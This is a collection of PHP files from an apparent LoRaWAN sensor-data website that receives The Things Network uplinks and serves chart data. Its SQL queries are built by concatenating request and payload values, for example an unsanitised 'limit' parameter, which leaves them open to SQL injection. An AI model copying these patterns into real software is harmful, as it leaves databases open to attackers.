} elseif($value->gtw_id == 'ttn_apeldoorn_werkgebouw-zuid') {
echo ' - Werkgebou<NAME>';
} elseif($value->gtw_id == 'eui-aa555a0000088227') {
echo ' - Apeldoorn Stadhuis';
} elseif($value->gtw_id == 'ttn_apeldoorn_stadhuis') {
echo ' - Apeldoorn Stadhuis';
} elseif($value->gtw_id == 'eui-aa555a0000088226') {
echo ' - Politiebureau - Europaweg';
} elseif($value->gtw_id == 'ttn_apeldoorn_europaweg') {
echo ' - Politiebureau - Europaweg';
} elseif($value->gtw_id == 'eui-600194ffff078812') {
echo ' - Industrial IT';
} elseif($value->gtw_id == 'industrialit') {
echo ' - Industrial IT Ugchelen';
} elseif($value->gtw_id == 'ttn_pe1mew_gateway_1') {
echo ' - RFSee GW1';
} elseif($value->gtw_id == 'ttn_pe1mew_gateway_0') {
echo ' - RFSee GW0';
} elseif($value->gtw_id == 'eui-b827ebfffe9c2876') {
echo ' - <NAME>';
} elseif($value->gtw_id == 'ttn-gw-fma01') {
echo ' - Oosterhout - Hofkersstraat';
} elseif($value->gtw_id == 'hollander_techniek_apeldoorn') {
echo ' - Apeldoorn - <NAME>';
} elseif($value->gtw_id == 'x-connections') {
echo ' - x-connections - Landmetersveld';
} elseif($value->gtw_id == 'eui-a020a6ffff195478') {
echo ' - Apeldoorn - Landmetersveld';
} elseif($value->gtw_id == 'eui-a84041183eedffff') {
echo ' - Apeldoorn - Waldeck-Pyrmontstraat';
} elseif($value->gtw_id == 'jeng_iot') {
echo ' - Jeng IoT';
} elseif($value->gtw_id == 'cicon') {
echo ' - Cicon';
} elseif($value->gtw_id == 'eui-a020a6ffff1957a9') {
echo ' - atranco';
} elseif($value->gtw_id == 'eui-b827ebfffe01891a') {
echo ' - Amstelveen Westhove';
} else {
echo ' - Unknown';
}
echo '<br/>';
$value = null;
}
echo '</td>';
//echo '<td valign="top">'.$row['Data'].'</td>';
echo '</tr>'."\n";
}
echo '</table>';
include('../footer.php');
echo '</div> <!-- /.container -->'."\n"; //container
include('jsendinclude.php');
?>
</body>
</html><file_sep><?php
include('db.php');
if(!is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
if($_REQUEST['type'] == null) {
echo 'type niet ingegeven';
exit();
}
if($_REQUEST['id'] == null) {
echo 'id niet ingegeven';
exit();
}
$limit = '';
if(isset($_REQUEST['limit'])) {
if($_REQUEST['limit'] != null) {
$limit = $_REQUEST['limit'];
}
}
$daysback = 0;
if(isset($_REQUEST['daysback'])) {
if($_REQUEST['daysback'] != null) {
if(is_numeric($_REQUEST['daysback'])) {
$daysback = addslashes($_REQUEST['daysback']);
$startDay = $daysback*-1 - 1;
}
}
}
switch($_REQUEST['type']) {
case 'firstpriority':
echo '[';
$i = 0;
$tagid = 1;
$sql = 'SELECT * FROM point WHERE Nodeid = '.addslashes($_REQUEST['id']).' ORDER BY Priority LIMIT 1';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$tagid = $row['Id'];
}
$sql = 'SELECT * FROM measurement'.$tagid.' WHERE Moment >= DATE_ADD(NOW(), INTERVAL -1 DAY) ORDER BY Moment';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
if($i != 0) {
echo ', ';
}
echo '[new Date('.substr($row['Moment'], 0, 4).','.(substr($row['Moment'], 5, 2)-1).','.substr($row['Moment'], 8, 2).','.substr($row['Moment'], 11, 2).','.substr($row['Moment'], 14, 2).','.substr($row['Moment'], 17, 2).'), '.$row['Tagvalue'].']';
$i++;
}
echo ']';
break;
case 'fullnode':
echo '[';
$i = 0;
$tagid = 1;
$sql = 'SELECT * FROM point WHERE Nodeid = '.addslashes($_REQUEST['id']).' ORDER BY Priority';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$points[] = array('id' => $row['Id'], 'name' => $row['Name'], 'priority' => $row['Priority']);
}
$data = null;
foreach($points as $point) {
$sql = 'SELECT *, unix_timestamp(Moment) as Timestamp FROM measurement'.$point['id'];
if($daysback == 0) {
$sql .= ' WHERE Moment >= DATE_ADD(NOW(), INTERVAL -1 DAY)';
} else {
$sql .= ' WHERE Moment >= DATE_ADD(NOW(), INTERVAL '.$startDay.' DAY) AND Moment < DATE_ADD(NOW(), INTERVAL -'.$daysback.' DAY)';
}
$sql .= ' ORDER BY Moment DESC';
if($limit != '') {
$sql = $sql.' LIMIT '.$limit;
}
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$data[$row['Timestamp']]['Moment'] = $row['Moment'];
$data[$row['Timestamp']]['Timestamp'] = $row['Timestamp'];
$data[$row['Timestamp']][$point['id']] = $row['Tagvalue'];
}
}
if($data != null) {
/*echo '<pre>';
var_dump($data);
exit();*/
usort($data, function($a, $b) {
return $a['Timestamp'] <=> $b['Timestamp'];
});
foreach($data as $row) {
if($i != 0) {
echo ', ';
}
echo '[new Date('.substr($row['Moment'], 0, 4).','.(substr($row['Moment'], 5, 2)-1).','.substr($row['Moment'], 8, 2).','.substr($row['Moment'], 11, 2).','.substr($row['Moment'], 14, 2).','.substr($row['Moment'], 17, 2).')';
foreach($points as $point) {
echo ', ';
if (array_key_exists($point['id'], $row)) {
if($row[$point['id']] != '') {
echo $row[$point['id']];
} else {
echo ' null';
}
} else {
echo ' null';
}
}
echo ']';
$i++;
}
}
echo ']';
break;
case 'combined':
switch($_REQUEST['id']) {
case 1:
$mesurementType = 'Temperatuur';
break;
case 2:
$mesurementType = 'Relative vochtigheid';
break;
case 3:
$mesurementType = 'Luchtdruk';
break;
case 4:
$mesurementType = 'Lichtintensiteit';
break;
case 5:
$mesurementType = 'Batterij';
break;
case 6:
$mesurementType = 'Radio actieve straling';
break;
case 7:
$mesurementType = 'Fijnstof';
break;
case 8:
$mesurementType = 'PM2.5';
break;
case 9:
$mesurementType = 'PM10';
break;
case 10:
break;
case 11:
break;
case 12:
break;
default:
echo 'Onbekend type.';
exit;
break;
}
echo '[';
$i = 0;
$tagid = 1;
$sql = 'SELECT point.Id, point.Name, point.Priority FROM point, node WHERE node.id = point.Nodeid AND point.Name LIKE \'%'.$mesurementType.'%\' AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY)';
if($_REQUEST['id'] == 10) {
$sql = 'SELECT point.Id, point.Name, point.Priority FROM point, node WHERE (point.Name LIKE \'%PM10%\' AND node.id = point.Nodeid AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY)) OR (point.Name LIKE \'%PM2.5%\' AND node.id = point.Nodeid AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY))';
//echo $sql;
}
if($_REQUEST['id'] == 11) {
$sql = 'SELECT point.Id, point.Name, point.Priority FROM point, node WHERE (point.Name LIKE \'%PM2.5%\' AND node.id = point.Nodeid AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY) AND node.Name LIKE \'% 2018 %\')';
//echo $sql;
}
if($_REQUEST['id'] == 12) {
$sql = 'SELECT point.Id, point.Name, point.Priority FROM point, node WHERE (point.Name LIKE \'%PM10%\' AND node.id = point.Nodeid AND Lastmessage >= DATE_ADD(NOW(), INTERVAL -1 DAY) AND node.Name LIKE \'% 2018 %\')';
//echo $sql;
}
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$points[] = array('id' => $row['Id'], 'name' => $row['Name'], 'priority' => $row['Priority']);
}
$data = null;
foreach($points as $point) {
$sql = 'SELECT *, unix_timestamp(Moment) as Timestamp FROM measurement'.$point['id'];
if($daysback == 0) {
$sql .= ' WHERE Moment >= DATE_ADD(NOW(), INTERVAL -1 DAY)';
} else {
$sql .= ' WHERE Moment >= DATE_ADD(NOW(), INTERVAL '.$startDay.' DAY) AND Moment < DATE_ADD(NOW(), INTERVAL -'.$daysback.' DAY)';
}
$sql .= ' ORDER BY Moment';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$data[$row['Timestamp']]['Moment'] = $row['Moment'];
$data[$row['Timestamp']][$point['id']] = $row['Tagvalue'];
}
}
foreach($data as $row) {
if($i != 0) {
echo ', ';
}
echo '[new Date('.substr($row['Moment'], 0, 4).','.(substr($row['Moment'], 5, 2)-1).','.substr($row['Moment'], 8, 2).','.substr($row['Moment'], 11, 2).','.substr($row['Moment'], 14, 2).','.substr($row['Moment'], 17, 2).')';
foreach($points as $point) {
echo ', ';
if(array_key_exists($point['id'], $row)){
if($row[$point['id']] != '') {
echo $row[$point['id']];
} else {
echo ' null';
}
} else {
echo ' null';
}
}
echo ']';
$i++;
}
echo ']';
break;
case 'messages':
echo '[';
$i = 0;
$tagid = 1;
$data = null;
$sql = 'SELECT YEAR(Moment) AS \'Year\', MONTH(Moment) AS \'Month\', DAY(Moment) AS \'Day\', HOUR(Moment) AS \'Hour\', Count(*) AS \'Aantal\' FROM apeldoornindata.loraraw WHERE Moment >= DATE_ADD(NOW(), INTERVAL -24 HOUR) GROUP BY DAY(Moment), HOUR(Moment)';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
if($i != 0) {
echo ', ';
}
echo '[new Date('.$row['Year'].','.($row['Month']-1).','.$row['Day'].','.$row['Hour'].',0,0), '.$row['Aantal'];
echo ']';
$i++;
}
echo ']';
break;
default:
echo 'Onbekend type.';
break;
}
?><file_sep><?php
function ERSTemp($payload) {
echo 'Payload: '.$payload.'<br/>';
echo 'Base64: '.base64_decode($payload).'<br/>';
echo 'Hex: '.strhex($payload).'<br/>';
}
function strhex($string) {
$hexstr = unpack('H*', $string);
return array_shift($hexstr);
}
ERSTemp("AQD+AjQEAtYFBAcNSBEA");
?><file_sep><?php
include('db.php');
logerror('start Cron');
$sql = 'SELECT * FROM loraraw WHERE processed = 0 LIMIT 1000';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
echo $row['Moment'].'<br/>';
$data = json_decode($row['Data']);
$devId = addslashes($data->dev_id);
$hwSerial = addslashes($data->hardware_serial);
$nodeId = null;
$nodeId = insertOrCreateNode($devId, $hwSerial);
processNodeStatistics($data, $nodeId);
processGatewayStatistics($data);
$sqlUpdate = 'UPDATE loraraw SET Processed=1, Nodeid= '.$nodeId.' WHERE Id = '.$row['Id'];
//echo $sqlUpdate.'<br/>';
mysqlquery($sqlUpdate);
}
function insertOrCreateNode($devId, $hwSerial) {
$nodeId = null;
$sql = 'SELECT * FROM node WHERE Devid = \''.addslashes($devId).'\' AND Hwserial = \''.addslashes($hwSerial).'\'';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$nodeId = $row['Id'];
}
if($nodeId == null) {
$sqlInsert = 'INSERT node SET Devid=\''.$devId.'\', Hwserial=\''.$hwSerial.'\'';
//echo $sqlInsert.'<br/>';
mysqlquery($sqlInsert);
}
$sql = 'SELECT * FROM node WHERE Devid = \''.addslashes($devId).'\' AND Hwserial = \''.addslashes($hwSerial).'\'';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$nodeId = $row['Id'];
}
return $nodeId;
}
function processNodeStatistics($data, $nodeId) {
$sqlSfString = '';
if(strpos($data->metadata->data_rate, 'SF7') !== false) {
$sqlSfString .= ', Sf7 = Sf7 + 1';
}
if(strpos($data->metadata->data_rate, 'SF8') !== false) {
$sqlSfString .= ', Sf8 = Sf8 + 1';
}
if(strpos($data->metadata->data_rate, 'SF9') !== false) {
$sqlSfString .= ', Sf9 = Sf9 + 1';
}
if(strpos($data->metadata->data_rate, 'SF10') !== false) {
$sqlSfString .= ', Sf10 = Sf10 + 1';
}
if(strpos($data->metadata->data_rate, 'SF11') !== false) {
$sqlSfString .= ', Sf11 = Sf11 + 1';
}
if(strpos($data->metadata->data_rate, 'SF12') !== false) {
$sqlSfString .= ', Sf12 = Sf12 + 1';
}
foreach($data->metadata->gateways as $gateway)
{
$sqlChannelString = '';
switch($gateway->channel) {
case 0:
$sqlChannelString .= ', Ch0 = Ch0 + 1';
break;
case 1:
$sqlChannelString .= ', Ch1 = Ch1 + 1';
break;
case 2:
$sqlChannelString .= ', Ch2 = Ch2 + 1';
break;
case 3:
$sqlChannelString .= ', Ch3 = Ch3 + 1';
break;
case 4:
$sqlChannelString .= ', Ch4 = Ch4 + 1';
break;
case 5:
$sqlChannelString .= ', Ch5 = Ch5 + 1';
break;
case 6:
$sqlChannelString .= ', Ch6 = Ch6 + 1';
break;
case 7:
$sqlChannelString .= ', Ch7 = Ch7 + 1';
break;
}
}
$sql2 = 'UPDATE node SET Lastmessage=NOW()'.$sqlSfString.' '.$sqlChannelString.', Packets = Packets + 1 WHERE Id = '.$nodeId;
//echo $sql2;
mysqlquery($sql2);
}
function processGatewayStatistics($data) {
$sqlSfString = '';
if(strpos($data->metadata->data_rate, 'SF7') !== false) {
$sqlSfString .= ', Sf7 = Sf7 + 1';
}
if(strpos($data->metadata->data_rate, 'SF8') !== false) {
$sqlSfString .= ', Sf8 = Sf8 + 1';
}
if(strpos($data->metadata->data_rate, 'SF9') !== false) {
$sqlSfString .= ', Sf9 = Sf9 + 1';
}
if(strpos($data->metadata->data_rate, 'SF10') !== false) {
$sqlSfString .= ', Sf10 = Sf10 + 1';
}
if(strpos($data->metadata->data_rate, 'SF11') !== false) {
$sqlSfString .= ', Sf11 = Sf11 + 1';
}
if(strpos($data->metadata->data_rate, 'SF12') !== false) {
$sqlSfString .= ', Sf12 = Sf12 + 1';
}
foreach($data->metadata->gateways as $gateway)
{
$sqlChannelString = '';
switch($gateway->channel) {
case 0:
$sqlChannelString .= ', Ch0 = Ch0 + 1';
break;
case 1:
$sqlChannelString .= ', Ch1 = Ch1 + 1';
break;
case 2:
$sqlChannelString .= ', Ch2 = Ch2 + 1';
break;
case 3:
$sqlChannelString .= ', Ch3 = Ch3 + 1';
break;
case 4:
$sqlChannelString .= ', Ch4 = Ch4 + 1';
break;
case 5:
$sqlChannelString .= ', Ch5 = Ch5 + 1';
break;
case 6:
$sqlChannelString .= ', Ch6 = Ch6 + 1';
break;
case 7:
$sqlChannelString .= ', Ch7 = Ch7 + 1';
break;
}
$sql1 = 'INSERT INTO gateway SET Lastmessage=NOW(), Gateway= \''.addslashes($gateway->gtw_id).'\' '.$sqlSfString.' '.$sqlChannelString.', Packets = Packets + 1 ON DUPLICATE KEY UPDATE Lastmessage=NOW() '.$sqlSfString.' '.$sqlChannelString.', Packets = Packets + 1 ';
//echo $sql;
mysqlquery($sql1);
}
}
?><file_sep><?php
set_time_limit(60);
include('db.php');
logerror('start loradata');
//logerror("Postcount: ". count($_POST));
//logerror(implode(",", $_POST));
//logerror("Requestcount: ". count($_REQUEST));
//logerror(implode(",", $_REQUEST));
//logerror("Getcount: ". count($_GET));
//logerror(implode(",", $_GET));
//$data = json_decode(file_get_contents('php://input'));
//logerror($data);
//logerror($HTTP_RAW_POST_DATA);
//$data = json_decode(file_get_contents('php://stdin'));
//logerror($data);
//logerror("Rawpostttnmapper: ".$HTTP_RAW_POST_DATA);
//var_dump($data);
echo 'Thanks';
$ruweData = file_get_contents('php://input');
if($ruweData != null) {
$sql = 'INSERT INTO lorarawttnmapper SET Moment=NOW(), Data= \''.addslashes($ruweData).'\'';
logerror('sql: '.$sql);
//echo $sql;
$result = mysqlquery($sql);
$dateNow = date('Y-m-d H:i:s');
$data = json_decode($ruweData);
if(addslashes($data->payload_fields->latitude) > 86 || addslashes($data->payload_fields->latitude) < -86) {
logerror('Invalid latitude');
die('Invalid latitude');
}
if(addslashes($data->payload_fields->longitude) > 180 || addslashes($data->payload_fields->longitude) < -180) {
logerror('Invalid longitude');
die('Invalid longitude');
}
logerror("Rawpostttnmappersql: $data->dev_id: ".$data->dev_id);
if($data->dev_id == 'paxcounter01') {
$sql = 'INSERT INTO gpslocation1 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude).', Alt='.addslashes($data->payload_fields->altitude).', Hdop='.addslashes($data->payload_fields->hdop);
logerror("Rawpostttnmappersql: ".$sql);
//echo $sql;
$result = mysqlquery($sql);
}
if($data->dev_id == 'kiptracker') {
$sql = 'INSERT INTO gpslocation2 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->gps_0->latitude).', Lon='.addslashes($data->payload_fields->gps_0->longitude).', Alt='.addslashes($data->payload_fields->gps_0->altitude);
logerror("Rawpostttnmappersql: ".$sql);
//echo $sql;
$result = mysqlquery($sql);
}
//$last_id = mysqli_insert_id();
//logerror('Result last insert id: '.$last_id);
/*
foreach($data->metadata->gateways as $gateway)
{
$sql1 = 'INSERT INTO gpsgateway SET Gpslocationid=\''.$last_id.'\', Gwid=\''.addslashes($gateway->gtw_id).'\', Channel=\''.addslashes($gateway->channel).'\', Rssi=\''.addslashes($gateway->rssi).'\', Snr=\''.addslashes($gateway->snr).'\'';
//echo $sql1;
}
*/
}
//{"app_id":"industrialit","dev_id":"node1","hardware_serial":"0000000002E00612","port":1,"counter":8416,"payload_raw":"MTYuNzszOC4xAGxkIQ==","payload_fields":{"byte1":49,"byte2":54,"byte3":46,"byte4":55,"byte5":59,"byte6":51,"byte7":56,"byte8":46,"byte9":49},"metadata":{"time":"2017-06-04T20:54:21.770859698Z","frequency":867.1,"modulation":"LORA","data_rate":"SF7BW125","coding_rate":"4/5","gateways":[{"gtw_id":"eui-aa555a0000088213","timestamp":2927612339,"time":"2017-06-04T20:54:19.648782Z","channel":3,"rssi":-118,"snr":-6,"latitude":52.21176,"longitude":5.96243,"altitude":65}]},"downlink_url":"https://integrations.thethingsnetwork.org/ttn-eu/api/v2/down/industrialit/cloudscada?key=<KEY>"}
?>
<file_sep><?php
include('db.php');
include('elsys.php');
include('tabs.php');
logerror('start loradata');
//logerror("Postcount: ". count($_POST));
//logerror(implode(",", $_POST));
//logerror("Requestcount: ". count($_REQUEST));
//logerror(implode(",", $_REQUEST));
//logerror("Getcount: ". count($_GET));
//logerror(implode(",", $_GET));
$data = json_decode(file_get_contents('php://input'));
logerror('phpInput: '.json_encode($data));
//logerror($HTTP_RAW_POST_DATA);
//$data = json_decode(file_get_contents('php://stdin'));
//logerror('stdin: '.$data);
//logerror("Rawpost: ".$HTTP_RAW_POST_DATA);
//var_dump($data);
echo 'Thanks';
$sendToLuftDaten = false;
$luftdatenSensorName = '';
$sendToRIVM = false;
function insertIntoInflux($nodeName, $insertData) {
logerror('Insert into Influx: '.$nodeName.' '.$insertData);
$ch = curl_init('http://localhost:8086/write?db=aid');
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch, CURLOPT_USERPWD, '<PASSWORD>');
curl_setopt($ch, CURLOPT_POSTFIELDS, $nodeName.' '.$insertData);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
}
$influxData = '';
logerror('LoraEndpoint: '.file_get_contents('php://input'));
$ruweData = file_get_contents('php://input');
if($ruweData != null) {
$sql = 'INSERT INTO loraraw SET Moment=NOW(), Data= \''.addslashes($ruweData).'\'';
//logerror('sql: '.$sql);
//echo $sql;
$result = mysqlquery($sql);
$dateNow = date('Y-m-d H:i:s');
$data = json_decode($ruweData);
switch($data->hardware_serial) {
case '0000000002E00612':
$resultString = "";
$resultString .= chr($data->payload_fields->byte1);
$resultString .= chr($data->payload_fields->byte2);
$resultString .= chr($data->payload_fields->byte3);
$resultString .= chr($data->payload_fields->byte4);
$resultString .= chr($data->payload_fields->byte5);
$resultString .= chr($data->payload_fields->byte6);
$resultString .= chr($data->payload_fields->byte7);
$resultString .= chr($data->payload_fields->byte8);
$resultString .= chr($data->payload_fields->byte9);
logError('Resultstring: '.$resultString);
$resultArray = explode(';', $resultString);
$sql = 'INSERT INTO measurement8 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($resultArray[0]);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement9 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($resultArray[1]);
//echo $sql;
$result = mysqlquery($sql);
break;
case 'AF5EE00000000001':
$sql = 'INSERT INTO measurement3 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->barometric_pressure_0);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement4 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->digital_in_3);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement5 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->digital_out_4);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement6 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_2);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement7 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_1);
//echo $sql;
$result = mysqlquery($sql);
break;
/*case '0004A30B001ECB0C':
if($data->dev_id == 'rfsee_aid_sensor_1') {
$sql = 'INSERT INTO measurement10 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_0);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement11 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_1);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement12 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_2);
//echo $sql;
$result = mysqlquery($sql);
if(isset($data->payload_fields->digital_in_3)) {
$sql = 'INSERT INTO measurement13 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->digital_in_3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break; */
case '0004A30B001F805A':
if($data->dev_id == 'rfsee_aid_sensor_1') {
if(isset($data->payload_fields->temperature_0)) {
$sql = 'INSERT INTO measurement22 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_0);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->relative_humidity_1)) {
$sql = 'INSERT INTO measurement23 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_1);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->luminosity_2)) {
$sql = 'INSERT INTO measurement24 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_2);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->digital_in_3)) {
$sql = 'INSERT INTO measurement25 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->digital_in_3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000002E00613':
if($data->dev_id == 'industrial_it_aid') {
$sql = 'INSERT INTO measurement14 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_1);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement15 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_2);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement16 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_3);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement17 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->barometric_pressure_4);
//echo $sql;
$result = mysqlquery($sql);
$nodeName = strtolower(str_replace('-', '', preg_replace('/\s+/', '', 'Industrial IT AiD')));
$influxData .= 'lux='.floatval($data->payload_fields->luminosity_1);
$influxData .= ',temperatuur='.floatval($data->payload_fields->temperature_2);
$influxData .= ',vochtigheid='.floatval($data->payload_fields->relative_humidity_3);
$influxData .= ',luchtdruk='.floatval($data->payload_fields->barometric_pressure_4);
insertIntoInflux($nodeName, $influxData);
}
break;
case '00998AF97646CF13':
if($data->dev_id == 'rfsee_aid_sensor_2') {
if(isset($data->payload_fields->temperature_10)) {
$sql = 'INSERT INTO measurement18 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->relative_humidity_20)) {
$sql = 'INSERT INTO measurement19 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_20);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->barometric_pressure_2)) {
$sql = 'INSERT INTO measurement20 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->barometric_pressure_2);
//echo $sql;
$result = mysqlquery($sql);
}
// Accu
if(isset($data->payload_fields->analog_in_0)) {
$sql = 'INSERT INTO measurement21 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_0);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->luminosity_51)) {
$sql = 'INSERT INTO measurement27 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_51);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->luminosity_50)) {
$sql = 'INSERT INTO measurement28 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_50);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '002CC2194BADD5C0':
if($data->dev_id == 'rfsee_aid_sensor_4') {
if(isset($data->payload_fields->analog_in_0)) {
$sql = 'INSERT INTO measurement29 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_0);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->temperature_1)) {
$sql = 'INSERT INTO measurement30 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_1);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->luminosity_4)) {
$sql = 'INSERT INTO measurement31 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_4);
//echo $sql;
$result = mysqlquery($sql);
}
/*
if(isset($data->payload_fields->digital_in_3)) {
$sql = 'INSERT INTO measurement32 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->digital_in_3);
//echo $sql;
$result = mysqlquery($sql);
}*/
}
break;
case '0014115D20F6F977':
if($data->dev_id == 'dust_sensor1') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement33 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case 'AF5EE00098767651':
if($data->dev_id == 'rfsee_aid_sensor_3') {
if(isset($data->payload_fields->analog_in_0)) {
$sql = 'INSERT INTO measurement34 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_0);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->temperature_1)) {
$sql = 'INSERT INTO measurement35 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_1);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case 'AF5EE05500000004':
if($data->dev_id == 'rfsee_aid_sensor_5') {
if(isset($data->payload_fields->analog_in_0)) {
$sql = 'INSERT INTO measurement36 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_0);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->temperature_1)) {
$sql = 'INSERT INTO measurement37 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_1);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0004A30B001B462B':
if($data->dev_id == 'rfsee_aid_sensor_10') {
if(isset($data->payload_fields->temperature_10)) {
$sql = 'INSERT INTO measurement44 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->relative_humidity_20)) {
$sql = 'INSERT INTO measurement45 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_20);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->barometric_pressure_30)) {
$sql = 'INSERT INTO measurement46 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->barometric_pressure_30);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->luminosity_51)) {
$sql = 'INSERT INTO measurement47 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_51);
//echo $sql;
$result = mysqlquery($sql);
$pm10 = $data->payload_fields->luminosity_51;
}
if(isset($data->payload_fields->luminosity_50)) {
$sql = 'INSERT INTO measurement48 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_50);
//echo $sql;
$result = mysqlquery($sql);
$pm25 = $data->payload_fields->luminosity_50;
}
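// Mark this uplink for forwarding to the RIVM and Luftdaten networks; the $pm10/$pm25 values
// captured above are reused when that forwarding is performed later in this script.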
$sendToRIVM = true;
$rivmSensorName = 'rfsee_aid_sensor_10 lat=52.211453,lon=5.983743';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-rfsee10';
}
break;
case '0004A30B001BF828':
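// rfsee_aid_sensor_11: same channel layout as sensor 10, likewise forwarded to RIVM and Luftdaten.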
if($data->dev_id == 'rfsee_aid_sensor_11') {
if(isset($data->payload_fields->temperature_10)) {
